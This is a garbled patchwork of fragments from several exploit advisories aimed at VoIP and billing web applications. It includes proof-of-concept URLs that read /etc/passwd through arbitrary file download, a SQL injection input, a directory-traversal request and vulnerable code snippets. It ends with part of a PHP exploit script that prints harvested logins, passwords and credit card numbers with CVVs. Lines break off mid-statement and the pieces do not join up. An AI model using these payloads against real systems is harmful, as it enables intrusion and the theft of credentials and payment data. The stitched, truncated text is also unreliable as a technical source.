: 168 file: manager_login.server.php
2) arbitrary file download
http://192.168.15.145/poligon/asttecs/records1.php?file=/etc/passwd
linie: 2 file:records.php
http://192.168.15.145/poligon/asttecs/records.php?file=/etc/passwd
linie: 2 file:records.php
3) and other security bugs
Michał Błaszczak
http://blaszczakm.blogspot.com
ectory_id = '".$record_id."' ";
2) SQL Injection
http://vbilling-host/customer/edit_customer
input Firstname: zuo’;-- (example)
Michał Błaszczak
http://blaszczakm.blogspot.com
txt") as $filename) {
file: voicemail.php line: 186 - 190
if(isset($_GET['folder'])) {
$vmfolder = $_GET['folder'];
} else {
$vmfolder = "INBOX";
}
POC:
http:///easyitsp/WEB/customer/voicemail.php?currentpage=phones&folder=../../
Michał Błaszczak
http://blaszczakm.blogspot.com
# Exploit Title: PIAF H.M.S - SQL Injection
# Date: 28/10/2012
# Author: Michał Błaszczak
# Website: http://blaszczakm.blogspot.com
# Vendor Homepage: http://code.google.com/p/piafhms/
file: bills.php
line: 86-87
$query = $query . " ORDER BY ID DESC";
printf($quer
$test = explode(" ",$login[1]);
if(trim($test[0])!='')
{
echo 'ID:'.$id_pod."\n";
echo 'LOGIN:'.$login[1]."\n";
echo 'Password:'.$pass[1]."\n";
echo 'CCnumber:'.$ccnum[1]."\n";
echo 'CCexpire:'.$ccexpire[1]."\n";
echo 'CCCVV:'.$cccvv[1]."\n\n";
}
}
?>
Michał Błaszczak
http://blaszczakm.blogspot.com